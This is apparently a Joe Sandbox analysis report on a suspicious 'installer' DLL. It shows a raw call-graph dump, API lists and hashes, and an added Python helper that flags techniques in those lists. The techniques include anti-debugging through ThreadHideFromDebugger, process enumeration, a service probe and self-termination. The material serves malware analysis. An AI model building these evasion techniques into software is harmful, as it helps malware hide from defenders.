64233->64235 64234->64228 64236 6c10f075 GetLastError 64234->64236 64237 6c114c92 __wsopen_s 18 API calls 64235->64237 64236->64228 64237->64231 64238->64143 64239->64159 64240->64165 64241->64152 64242->64042 64244 6c104299 64243->64244 64245 6c1042ae 64243->64245 64281 6c103810 18 API calls __cftoe 64244->64281 64249 6c1042a9 64245->64249 64259 6c1043a9 64245->64259 64249->64045 64253 6c1042d1 64274 6c10ef88 64253->64274 64255 6c1042d7 64255->64249 64282 6c107eab HeapFree GetLastError _free 64255->64282 64257->64040 64258->64040 64260 6c1043c1 64259->64260 64261 6c1042c3 64259->64261 64260->64261 64262 6c10d350 18 API calls 64260->64262 64265 6c10be2e 64261->64265 64263 6c1043df 64262->64263 64283 6c10f25c 64263->64283 64266 6c10be45 64265->64266 64267 6c1042cb 64265->64267 64266->64267 64366 6c107eab HeapFree GetLastError _free 64266->64366 64269 6c10d350 64267->64269 64270 6c10d371 64269->64270 64271 6c10d35c 64269->64271 64270->64253 64367 6c103810 18 API calls __cftoe 64271->64367 64273 6c10d36c 64273->64253 64275 6c10efae 64274->64275 64279 6c10ef99 __dosmaperr 64274->64279 64276 6c10efd5 64275->64276 64278 6c10eff7 __dosmaperr 64275->64278 64368 6c10f0b1 64276->64368 64376 6c103810 18 API calls __cftoe 64278->64376 64279->64255 64281->64249 64282->64249 64284 6c10f268 __wsopen_s 64283->64284 64285 6c10f2ba 64284->64285 64287 6c10f323 __dosmaperr 64284->64287 64290 6c10f270 __dosmaperr 64284->64290 64294 6c115080 EnterCriticalSection 64285->64294 64324 6c103810 18 API calls __cftoe 64287->64324 64288 6c10f2c0 64292 6c10f2dc __dosmaperr 64288->64292 64295 6c10f34e 64288->64295 64290->64261 64323 6c10f31b LeaveCriticalSection __wsopen_s 64292->64323 64294->64288 64296 6c10f370 64295->64296 64322 6c10f38c __dosmaperr 64295->64322 64297 6c10f3c4 64296->64297 64299 6c10f374 __dosmaperr 64296->64299 64298 6c10f3d7 64297->64298 64333 6c10e359 20 API calls __wsopen_s 64297->64333 64325 6c10f530 64298->64325 64332 6c103810 18 API calls __cftoe 64299->64332 64304 
6c10f42c 64306 6c10f440 64304->64306 64307 6c10f485 WriteFile 64304->64307 64305 6c10f3ed 64308 6c10f3f1 64305->64308 64309 6c10f416 64305->64309 64312 6c10f475 64306->64312 64313 6c10f44b 64306->64313 64310 6c10f4a9 GetLastError 64307->64310 64307->64322 64308->64322 64334 6c10f94b 6 API calls __wsopen_s 64308->64334 64335 6c10f5a1 43 API calls 5 library calls 64309->64335 64310->64322 64338 6c10f9b3 7 API calls 2 library calls 64312->64338 64314 6c10f450 64313->64314 64315 6c10f465 64313->64315 64318 6c10f455 64314->64318 64314->64322 64337 6c10fb77 8 API calls 3 library calls 64315->64337 64336 6c10fa8e 7 API calls 2 library calls 64318->64336 64320 6c10f463 64320->64322 64322->64292 64323->64290 64324->64290 64326 6c1150d5 __wsopen_s 18 API calls 64325->64326 64328 6c10f541 64326->64328 64327 6c10f3e8 64327->64304 64327->64305 64328->64327 64339 6c1080a2 GetLastError 64328->64339 64331 6c10f57e GetConsoleMode 64331->64327 64332->64322 64333->64298 64334->64322 64335->64322 64336->64320 64337->64320 64338->64320 64340 6c1080bf 64339->64340 64341 6c1080b9 64339->64341 64342 6c10a252 __Getctype 6 API calls 64340->64342 64345 6c1080c5 SetLastError 64340->64345 64343 6c10a213 __Getctype 6 API calls 64341->64343 64344 6c1080dd 64342->64344 64343->64340 64344->64345 64346 6c1080e1 64344->64346 64352 6c108153 64345->64352 64353 6c108159 64345->64353 64347 6c10a8d5 __Getctype EnterCriticalSection LeaveCriticalSection HeapAlloc 64346->64347 64349 6c1080ed 64347->64349 64350 6c1080f5 64349->64350 64351 6c10810c 64349->64351 64356 6c10a252 __Getctype 6 API calls 64350->64356 64355 6c10a252 __Getctype 6 API calls 64351->64355 64352->64327 64352->64331 64354 6c1041b9 __Getctype 35 API calls 64353->64354 64357 6c10815e 64354->64357 64358 6c108118 64355->64358 64359 6c108103 64356->64359 64360 6c10811c 64358->64360 64361 6c10812d 64358->64361 64363 6c107eab _free HeapFree GetLastError 64359->64363 64362 6c10a252 __Getctype 6 API calls 64360->64362 64365 6c107eab _free HeapFree 
GetLastError 64361->64365 64362->64359 64364 6c108109 64363->64364 64364->64345 64365->64364 64366->64267 64367->64273 64369 6c10f0bd __wsopen_s 64368->64369 64377 6c115080 EnterCriticalSection 64369->64377 64371 6c10f0cb 64372 6c10f015 __wsopen_s 21 API calls 64371->64372 64373 6c10f0f8 64371->64373 64372->64373 64378 6c10f131 LeaveCriticalSection __wsopen_s 64373->64378 64375 6c10f11a 64375->64279 64376->64279 64377->64371 64378->64375 64379->63880 64380->63882 64381->63880 64382->63880 64383->63880 64385 6bfc022e 64384->64385 64386 6bf970c4 64385->64386 64391 6c104ecb 64385->64391 64386->63893 64388->63894 64389->63896 64390->63898 64392 6c104ef6 64391->64392 64393 6c104ed9 64391->64393 64392->64385 64393->64392 64394 6c104efa 64393->64394 64396 6c104ee6 64393->64396 64399 6c1050f2 64394->64399 64407 6c103810 18 API calls __cftoe 64396->64407 64400 6c1050fe __wsopen_s 64399->64400 64408 6c0ffc99 EnterCriticalSection 64400->64408 64402 6c10510c 64409 6c1050af 64402->64409 64406 6c104f2c 64406->64385 64407->64392 64408->64402 64417 6c10bc96 64409->64417 64415 6c1050e9 64416 6c105141 LeaveCriticalSection 64415->64416 64416->64406 64418 6c10d350 18 API calls 64417->64418 64419 6c10bca7 64418->64419 64420 6c1150d5 __wsopen_s 18 API calls 64419->64420 64422 6c10bcad __wsopen_s 64420->64422 64421 6c1050c3 64424 6c104f2e 64421->64424 64422->64421 64434 6c107eab HeapFree GetLastError _free 64422->64434 64426 6c104f40 64424->64426 64428 6c104f5e 64424->64428 64425 6c104f4e 64435 6c103810 18 API calls __cftoe 64425->64435 64426->64425 64426->64428 64430 6c104f76 _Yarn 64426->64430 64433 6c10bd49 62 API calls 64428->64433 64429 6c1043a9 62 API calls 64429->64430 64430->64428 64430->64429 64431 6c10d350 18 API calls 64430->64431 64432 6c10f25c __wsopen_s 62 API calls 64430->64432 64431->64430 64432->64430 64433->64415 64434->64421 64435->64428 64437 6c0f9715 64436->64437 64438 6bfc2020 52 API calls 64437->64438 64439 6c0f97b6 64438->64439 64440 6c0fa133 std::_Facet_Register 
4 API calls 64439->64440 64441 6c0f97ee 64440->64441 64442 6c0faa17 43 API calls 64441->64442 64443 6c0f9802 64442->64443 64444 6bfc1d90 89 API calls 64443->64444 64445 6c0f98ab 64444->64445 64446 6c0f98dc 64445->64446 64490 6bfc2250 30 API calls 64445->64490 64446->63909 64448 6c0f9916 64491 6bfc26e0 24 API calls 4 library calls 64448->64491 64450 6c0f9928 64492 6c0fca69 RaiseException 64450->64492 64452 6c0f993d 64493 6bfbe010 67 API calls 64452->64493 64454 6c0f994f 64454->63909 64456 6c0f9a7d 64455->64456 64494 6c0f9c90 64456->64494 64458 6c0f9b6c 64458->63914 64459 6c0f9a95 64459->64458 64512 6bfc2250 30 API calls 64459->64512 64513 6bfc26e0 24 API calls 4 library calls 64459->64513 64514 6c0fca69 RaiseException 64459->64514 64464 6bfd304f 64463->64464 64467 6bfd3063 64464->64467 64523 6bfc3560 32 API calls std::_Xinvalid_argument 64464->64523 64468 6bfd311e 64467->64468 64525 6bfc2250 30 API calls 64467->64525 64526 6bfc26e0 24 API calls 4 library calls 64467->64526 64527 6c0fca69 RaiseException 64467->64527 64469 6bfd3131 64468->64469 64524 6bfc37e0 32 API calls std::_Xinvalid_argument 64468->64524 64469->63914 64474 6c0f928e 64473->64474 64478 6c0f92c1 64473->64478 64476 6bfc01f0 64 API calls 64474->64476 64475 6c0f9373 64475->63920 64477 6c0f92b4 64476->64477 64479 6c104208 67 API calls 64477->64479 64478->64475 64528 6bfc2250 30 API calls 64478->64528 64479->64478 64481 6c0f939e 64529 6bfc2340 24 API calls 64481->64529 64483 6c0f93ae 64530 6c0fca69 RaiseException 64483->64530 64485 6c0f93b9 64531 6bfbe010 67 API calls 64485->64531 64487 6c0f9412 std::ios_base::_Ios_base_dtor 64487->63920 64488->63912 64489->63919 64490->64448 64491->64450 64492->64452 64493->64454 64495 6c0f9ccc 64494->64495 64496 6c0f9cf8 64494->64496 64497 6c0f9cf1 64495->64497 64517 6bfc2250 30 API calls 64495->64517 64502 6c0f9d09 64496->64502 64515 6bfc3560 32 API calls std::_Xinvalid_argument 64496->64515 64497->64459 64500 6c0f9ed8 64518 6bfc2340 24 API calls 64500->64518 
64502->64497 64516 6bfc2f60 42 API calls 4 library calls 64502->64516 64503 6c0f9ee7 64519 6c0fca69 RaiseException 64503->64519 64507 6c0f9f17 64521 6bfc2340 24 API calls 64507->64521 64509 6c0f9f2d 64522 6c0fca69 RaiseException 64509->64522 64511 6c0f9d43 64511->64497 64520 6bfc2250 30 API calls 64511->64520 64512->64459 64513->64459 64514->64459 64515->64502 64516->64511 64517->64500 64518->64503 64519->64511 64520->64507 64521->64509 64522->64497 64523->64467 64524->64469 64525->64467 64526->64467 64527->64467 64528->64481 64529->64483 64530->64485 64531->64487 64532 6bf73d62 64534 6bf73bc0 64532->64534 64533 6bf73e8a GetCurrentThread NtSetInformationThread 64535 6bf73eea 64533->64535 64534->64533 64536 6bf8f150 64538 6bf8efbe 64536->64538 64537 6bf8f243 CreateFileA 64540 6bf8f2a7 64537->64540 64538->64537 64539 6bf902ca 64540->64539 64541 6bf902ac GetCurrentProcess TerminateProcess 64540->64541 64541->64539 64542 6bf83b72 64543 6c0fa133 std::_Facet_Register 4 API calls 64542->64543 64550 6bf837e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 64543->64550 64544 6c0ee090 2 API calls 64544->64550 64546 6bf96ba0 104 API calls 64546->64550 64547 6bf96e60 32 API calls 64547->64550 64548 6bf97090 77 API calls 64548->64550 64550->64544 64550->64546 64550->64547 64550->64548 64552 6bf9639e 64550->64552 64555 6bfbe010 67 API calls 64550->64555 64556 6c103820 18 API calls 2 library calls 64552->64556 64555->64550 64557 6bf8f8a3 64559 6bf8f887 64557->64559 64558 6bf902ac GetCurrentProcess TerminateProcess 64560 6bf902ca 64558->64560 64559->64558 64561 6c10262f 64562 6c10263b __wsopen_s 64561->64562 64563 6c102642 GetLastError ExitThread 64562->64563 64564 6c10264f 64562->64564 64565 6c1080a2 __Getctype 37 API calls 64564->64565 64566 6c102654 64565->64566 64573 6c10d456 64566->64573 64569 6c10266b 64579 6c10259a 16 API calls 2 library calls 64569->64579 64572 6c10268d 64574 6c10265f 64573->64574 64575 6c10d468 GetPEB 64573->64575 64574->64569 64578 6c10a45f 5 API calls 
std::_Lockit::_Lockit 64574->64578 64575->64574 64576 6c10d47b 64575->64576 64580 6c10a508 5 API calls std::_Lockit::_Lockit 64576->64580 64578->64569 64579->64572 64580->64574
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: _strlen
                            • String ID: HR^
                            • API String ID: 4218353326-1341859651
                            • Opcode ID: 592af67698cc265935206baf8029ba2869aabb383b79198237dadcf4f53f2680
                            • Instruction ID: 59c7cf3ac05874eb06e3969895dcb369c5b84ece38ae678d9bacd378df288f5a
                            • Opcode Fuzzy Hash: 592af67698cc265935206baf8029ba2869aabb383b79198237dadcf4f53f2680
                            • Instruction Fuzzy Hash: 3274E772644B018FC738CF28D8D0695B7F3EF953147198ABEC0A68B665E778B54ACB40

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 4604 6c0f8930-6c0f8964 CreateToolhelp32Snapshot 4605 6c0f8980-6c0f8989 4604->4605 4606 6c0f898b-6c0f8990 4605->4606 4607 6c0f89d0-6c0f89d5 4605->4607 4608 6c0f8a0d-6c0f8a12 4606->4608 4609 6c0f8992-6c0f8997 4606->4609 4610 6c0f89d7-6c0f89dc 4607->4610 4611 6c0f8a34-6c0f8a62 call 6c0ff010 Process32FirstW 4607->4611 4616 6c0f8a8b-6c0f8a90 4608->4616 4617 6c0f8a14-6c0f8a2f CloseHandle 4608->4617 4612 6c0f8999-6c0f899e 4609->4612 4613 6c0f8966-6c0f8973 4609->4613 4614 6c0f8a64-6c0f8a71 Process32NextW 4610->4614 4615 6c0f89e2-6c0f89e7 4610->4615 4619 6c0f8a76-6c0f8a86 4611->4619 4612->4605 4621 6c0f89a0-6c0f89ca call 6c1062f5 4612->4621 4613->4605 4614->4619 4615->4605 4622 6c0f89e9-6c0f8a08 4615->4622 4616->4605 4620 6c0f8a96-6c0f8aa4 4616->4620 4617->4605 4619->4605 4621->4605 4622->4605
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C0F893E
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: CreateSnapshotToolhelp32
                            • String ID:
                            • API String ID: 3332741929-0
                            • Opcode ID: 5e9569a995a674e1e66a4213c62e9d7f92f5171ef7b0ef18ff2dd56745a8c9ac
                            • Instruction ID: c409baba07b2d135411b8075cd01e3a205fd291e8746dcc822c076fe039e5f6d
                            • Opcode Fuzzy Hash: 5e9569a995a674e1e66a4213c62e9d7f92f5171ef7b0ef18ff2dd56745a8c9ac
                            • Instruction Fuzzy Hash: 3C3150702093019FDB019F5AD88479EBBE4AF86708F544A2EE8E8D6360D731D8868B53

                            Control-flow Graph

                            • Function 6bf73886 (graph image omitted): a many-block graph whose block 6bf73e81-6bf73ee0 calls subroutine 6bf73750, GetCurrentThread and NtSetInformationThread; several blocks call subroutines 6c0c2a20 and 6c0c2a30
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 729ffab1d06836f4d4cd5bf3e880a13a602f47e73b8e0a1283b129930850f1e5
                            • Instruction ID: dd1e2a148e335a7281d9b99250fa243ec568a6fcf0518504545e28c8c93eb276
                            • Opcode Fuzzy Hash: 729ffab1d06836f4d4cd5bf3e880a13a602f47e73b8e0a1283b129930850f1e5
                            • Instruction Fuzzy Hash: E932B233244B018FC334CF28D890695B7E3EF953147698AAEC0EA5B6A5D779B44BCB50
                            APIs
                            Similarity
                            • API ID: CurrentThread
                            • String ID:
                            • API String ID: 2882836952-0
                            • Opcode ID: 3340ccee4f1b99afc0da7b15bb655d76f117170b6c9cf2dc59b2343fe0d48fb3
                            • Instruction ID: d37f8a5cd0a388afd14c33f9d5a433aae1aad569bb5ba2ea9146a935b353696a
                            • Opcode Fuzzy Hash: 3340ccee4f1b99afc0da7b15bb655d76f117170b6c9cf2dc59b2343fe0d48fb3
                            • Instruction Fuzzy Hash: 8F51C033554B019FC331DF28D4807C5B7E3AF95310F658AAEC0E61B6A5DB79B44A8B41
                            APIs
                            Similarity
                            • API ID: CurrentThread
                            • String ID:
                            • API String ID: 2882836952-0
                            • Opcode ID: ee906603786dd1558aa7e703ecb83ec436105050c4edfd4766b9d2d2d2d57d54
                            • Instruction ID: 784404f751000b6467abbb85973e5fd6775cd51a5a985c636c4ff37aba2fca74
                            • Opcode Fuzzy Hash: ee906603786dd1558aa7e703ecb83ec436105050c4edfd4766b9d2d2d2d57d54
                            • Instruction Fuzzy Hash: 8551DC33504B01DBC330DF28D480795B7E3AF95310F658AAEC0EA5B6A1DB78B44B8B81
                            APIs
                            • GetCurrentThread.KERNEL32 ref: 6BF73E9D
                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6BF73EAA
                            Similarity
                            • API ID: Thread$CurrentInformation
                            • String ID:
                            • API String ID: 1650627709-0
                            • Opcode ID: 06abe5b232cf6d6bae9fe44162bd2f82fe6ef84ee3f2ad0d1bfe179f83c2db4e
                            • Instruction ID: e70801975fa0a9ac1f620d376ce3d2c680a6c38059f04150cd1a31e5e42b9352
                            • Opcode Fuzzy Hash: 06abe5b232cf6d6bae9fe44162bd2f82fe6ef84ee3f2ad0d1bfe179f83c2db4e
                            • Instruction Fuzzy Hash: 2E312433654B01CFC330DF38D8847C6B7A3AF95314F154AAEC0A65B6A0DB78700A8B52
                            APIs
                            • GetCurrentThread.KERNEL32 ref: 6BF73E9D
                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6BF73EAA
                            Similarity
                            • API ID: Thread$CurrentInformation
                            • String ID:
                            • API String ID: 1650627709-0
                            • Opcode ID: 3938c4ec921a95f8139f6707f8ceb84b8560f14c603c05ad2f216a0125260f89
                            • Instruction ID: 78cca66955451430a525c60fd9d5edafd9ba9f5fd101bea93b253afbd5013fa3
                            • Opcode Fuzzy Hash: 3938c4ec921a95f8139f6707f8ceb84b8560f14c603c05ad2f216a0125260f89
                            • Instruction Fuzzy Hash: C731F033114B01DBC734DF28D480796B7A3AF95304F254AAEC0EA4B2A1DB7970068B92
                            APIs
                            • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6C0F8820
                            • OpenServiceA.ADVAPI32(?,?,00000004), ref: 6C0F88C5
                            Similarity
                            • API ID: Open$ManagerService
                            • String ID:
                            • API String ID: 2351955762-0
                            • Opcode ID: 659a5cac50a1f9c3241f2dbbf88c5113de9273f0d5f5d145bfb92dd264cd075e
                            • Instruction ID: 18952b398cd5c465ca5d820e9eb30f5ed8df45d87ce722a50c0cd5cef9f94370
                            • Opcode Fuzzy Hash: 659a5cac50a1f9c3241f2dbbf88c5113de9273f0d5f5d145bfb92dd264cd075e
                            • Instruction Fuzzy Hash: 8C311A74508302AFD700CF29C849B4EBBF0AB8A754F54895AF8A4D7261D271C88A9B63
                            APIs
                            • GetCurrentThread.KERNEL32 ref: 6BF73E9D
                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6BF73EAA
                            Similarity
                            • API ID: Thread$CurrentInformation
                            • String ID:
                            • API String ID: 1650627709-0
                            • Opcode ID: e4e179ae864ce4e9c30a18518e701b08713b222785fd702eeed0d85736163cc7
                            • Instruction ID: 70887e545599ac2062e925480c7d873b8336fadd7a888b12f35044b61acfd69c
                            • Opcode Fuzzy Hash: e4e179ae864ce4e9c30a18518e701b08713b222785fd702eeed0d85736163cc7
                            • Instruction Fuzzy Hash: 1821E573218701DBD734EF24D8947D6B7B3AF46304F544AAEC0A64B6A0EB7874068B92
                            APIs
                            • FindFirstFileA.KERNEL32(?,?), ref: 6C0EE0AC
                            • FindClose.KERNEL32(000000FF), ref: 6C0EE0E2
                            Similarity
                            • API ID: Find$CloseFileFirst
                            • String ID:
                            • API String ID: 2295610775-0
                            • Opcode ID: 3eab0afd5e903adc270d060bd5f7eb17fadb95a16639aafec1b33f41291ab8c0
                            • Instruction ID: 06e388040393c732c14973f30522341bdd8ed796c86bd03cfd7334f3210b09a8
                            • Opcode Fuzzy Hash: 3eab0afd5e903adc270d060bd5f7eb17fadb95a16639aafec1b33f41291ab8c0
                            • Instruction Fuzzy Hash: 6F1125746487559FC7208F28D944A4ABBE4AB8A314F548D5AE4B8CA7A0D734D988CB82
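The API lists above carry the interesting facts of this part of the report: `NtSetInformationThread(<thread>, 00000011, 0, 0)` uses THREADINFOCLASS 0x11, ThreadHideFromDebugger, after which the kernel stops delivering exceptions and breakpoint events for that thread to an attached debugger (a debugger can confirm the state with NtQueryInformationThread for the same class, which returns a BOOLEAN); `CreateToolhelp32Snapshot(00000002, 0)` is TH32CS_SNAPPROCESS, i.e. a process listing walked with Process32FirstW/Process32NextW; `OpenSCManagerA(..., 00000001)` plus `OpenServiceA(..., 00000004)` is SC_MANAGER_CONNECT followed by SERVICE_QUERY_STATUS, a read-only probe for whether a named service exists and what state it is in. The triage helper below is an added example written for this page; it is not part of Joe Sandbox or of the sample. It parses the rendered `• Name.MODULE(args), ref: ADDR` lines and flags those whose recovered stack arguments match the constants just named. The constants are real Windows SDK values; the rules themselves are this editor's heuristics, and the sample input is copied from the report's own API lists above. Lines tagged `LIBCMT` (such as `__dosmaperr`) are C-runtime internals and are deliberately left unflagged.

```python
"""Triage helper for the 'APIs' lines of a Joe Sandbox function listing.

Added example for this report page, not Joe Sandbox code and not from the sample.
Line formats handled (as rendered in the report; '?' = argument not recovered):
    • Name.MODULE(arg,arg,...), ref: ADDRESS
    • Name.MODULE ref: ADDRESS
    • Part of subcall function ADDR: Name.MODULE(...), ref: ADDRESS
"""
import re
from dataclasses import dataclass
from typing import List, Optional

API_LINE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Windows SDK / NT header values (these are the real constants, not assumptions).
THREAD_HIDE_FROM_DEBUGGER = 0x11   # THREADINFOCLASS used with NtSetInformationThread
TH32CS_SNAPPROCESS = 0x00000002    # CreateToolhelp32Snapshot: include process list
SC_MANAGER_CONNECT = 0x00000001    # OpenSCManager desired access
SERVICE_QUERY_STATUS = 0x00000004  # OpenService desired access


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Optional[int]]  # None where the report printed '?'
    ref: int                   # address of the call instruction
    subcall: bool              # True for 'Part of subcall function' lines


@dataclass
class Finding:
    ref: str
    api: str
    note: str


def parse_args(raw: Optional[str]) -> List[Optional[int]]:
    """'00000000,00000011,?' -> [0, 17, None]; a call shown without parentheses -> []."""
    if not raw or not raw.strip():
        return []
    return [None if tok.strip() == "?" else int(tok, 16) for tok in raw.split(",")]


def parse_api_lines(text: str) -> List[ApiCall]:
    """Extract every API reference line; non-matching lines (headers, hashes) are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            calls.append(ApiCall(m["name"], m["module"].upper(), parse_args(m["args"]),
                                 int(m["ref"], 16), m["sub"] is not None))
    return calls


def classify(call: ApiCall) -> Optional[str]:
    """Heuristic rules (this example's own): a note when the recovered arguments identify a technique."""
    a = call.args
    if call.name == "NtSetInformationThread" and len(a) > 1 and a[1] == THREAD_HIDE_FROM_DEBUGGER:
        return "anti-debug: ThreadHideFromDebugger (0x11); thread stops raising debug events"
    if call.name == "CreateToolhelp32Snapshot" and a and a[0] is not None and a[0] & TH32CS_SNAPPROCESS:
        return "process enumeration: TH32CS_SNAPPROCESS snapshot"
    if call.name in ("Process32FirstW", "Process32NextW", "Process32First", "Process32Next"):
        return "process enumeration: walking a Toolhelp snapshot"
    if call.name.startswith("OpenSCManager") and len(a) > 2 and a[2] == SC_MANAGER_CONNECT:
        return "service probe: SCM opened with SC_MANAGER_CONNECT only"
    if call.name.startswith("OpenService") and len(a) > 2 and a[2] == SERVICE_QUERY_STATUS:
        return "service probe: OpenService with SERVICE_QUERY_STATUS (status check, no control)"
    return None  # CRT internals (LIBCMT), generic file APIs etc. produce no finding


def triage(text: str) -> List[Finding]:
    findings = []
    for call in parse_api_lines(text):
        note = classify(call)
        if note is not None:
            findings.append(Finding(f"{call.ref:08X}", call.name, note))
    return findings


# Sample input: API lines copied verbatim from the function listings in this report.
SAMPLE = """\
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C0F893E
• GetCurrentThread.KERNEL32 ref: 6BF73E9D
• NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6BF73EAA
• OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6C0F8820
• OpenServiceA.ADVAPI32(?,?,00000004), ref: 6C0F88C5
• FindFirstFileA.KERNEL32(?,?), ref: 6C0EE0AC
• FindClose.KERNEL32(000000FF), ref: 6C0EE0E2
  • Part of subcall function 6C117B47: CreateFileW.KERNEL32(00000000,00000000,?,6C117805,?,?,00000000,?,6C117805,00000000,0000000C), ref: 6C117B64
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C117870
• __dosmaperr.LIBCMT ref: 6C117877
"""

if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f"{f.ref}  {f.api:<26} {f.note}")
```

Run against the sample, the four flagged calls are CreateToolhelp32Snapshot, NtSetInformationThread, OpenSCManagerA and OpenServiceA; the GetLastError/__dosmaperr pair and the CreateFileW subcall stay silent because they are CRT plumbing. The argument columns are raw stack values recovered by the analyzer, so the rules only fire on positions the report actually filled in, and a `?` in the decisive slot yields no finding rather than a guess.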

                            Control-flow Graph

                            • Function 6c1101c3 (graph image omitted): blocks call GetConsoleMode, ReadConsoleW, ReadFile and GetLastError, plus internal subroutines 6c1030cf, 6c1030bc, 6c103810, 6c107ee5, 6c107eab, 6c10e359, 6c1150d5, 6c1030e2, 6c1105ee, 6c110573 and 6c1108a6
                            Strings
                            Similarity
                            • API ID:
                            • String ID: 8Q
                            • API String ID: 0-4022487301
                            • Opcode ID: 4f6e1a1ce35c884c8daa9742a2abb40c24cfba8a2b6483217b6e6deb67b3f2f1
                            • Instruction ID: cdd0268a701f3f9f975d7b4337111d4e55fecd59ad083c7b6f54f896efefe6da
                            • Opcode Fuzzy Hash: 4f6e1a1ce35c884c8daa9742a2abb40c24cfba8a2b6483217b6e6deb67b3f2f1
                            • Instruction Fuzzy Hash: 45C1D370E09289DFEF01CF99D880BADBBB0AF4A318F104169E514ABF81C779D955CB61

                            Control-flow Graph

                            • Function 6c11775c (graph image omitted): blocks call GetFileType, GetLastError and CloseHandle, plus internal subroutines 6c117bdc, 6c114cfc, 6c117b47, 6c1030cf, 6c1030bc, 6c1030e2, 6c114ea0, 6c117e00, 6c117d56, 6c10f015 and 6c114e0f
                            APIs
                              • Part of subcall function 6C117B47: CreateFileW.KERNEL32(00000000,00000000,?,6C117805,?,?,00000000,?,6C117805,00000000,0000000C), ref: 6C117B64
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C117870
                            • __dosmaperr.LIBCMT ref: 6C117877
                            • GetFileType.KERNEL32(00000000), ref: 6C117883
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C11788D
                            • __dosmaperr.LIBCMT ref: 6C117896
                            • CloseHandle.KERNEL32(00000000), ref: 6C1178B6
                            • CloseHandle.KERNEL32(6C10E7C0), ref: 6C117A03
                            • GetLastError.KERNEL32 ref: 6C117A35
                            • __dosmaperr.LIBCMT ref: 6C117A3C
                            Strings
                            Similarity
                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                            • String ID: 8Q
                            • API String ID: 4237864984-4022487301
                            • Opcode ID: 48c96b67648e8e634aab6eb3d02f78c05b923e3c3dc6417d53fdf89cf62ca245
                            • Instruction ID: bf085ce7743e974dbdef7e8e97f50c7381c9de6df0ee68d695fc1550a839e3ad
                            • Opcode Fuzzy Hash: 48c96b67648e8e634aab6eb3d02f78c05b923e3c3dc6417d53fdf89cf62ca245
                            • Instruction Fuzzy Hash: E0A14B31A081158FDF09DF68DC51BAD7BB1AB07328F18416EE811EFB90DB398916C791
                            APIs
                            • WriteFile.KERNEL32(?,?,00000038,?,00000000), ref: 6C0CB62F
                            Strings
                            Similarity
                            • API ID: FileWrite
                            • String ID: *$,=ym$-=ym$-=ym$B$H
                            • API String ID: 3934441357-3163594065
                            • Opcode ID: 62b52d34b9d52a484f5d74cefc312c46e56836fbed96c56006fb1c6df4eb16b3
                            • Instruction ID: 4d64c19721b749ff8c89568c4090ef0e204bf0f969b8935788e793eb37fb44ae
                            • Opcode Fuzzy Hash: 62b52d34b9d52a484f5d74cefc312c46e56836fbed96c56006fb1c6df4eb16b3
                            • Instruction Fuzzy Hash: 27727AB46093459FCB24CF28C49075EBBE1AF99304F688E1EE499CBB50E774D8858B53
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp
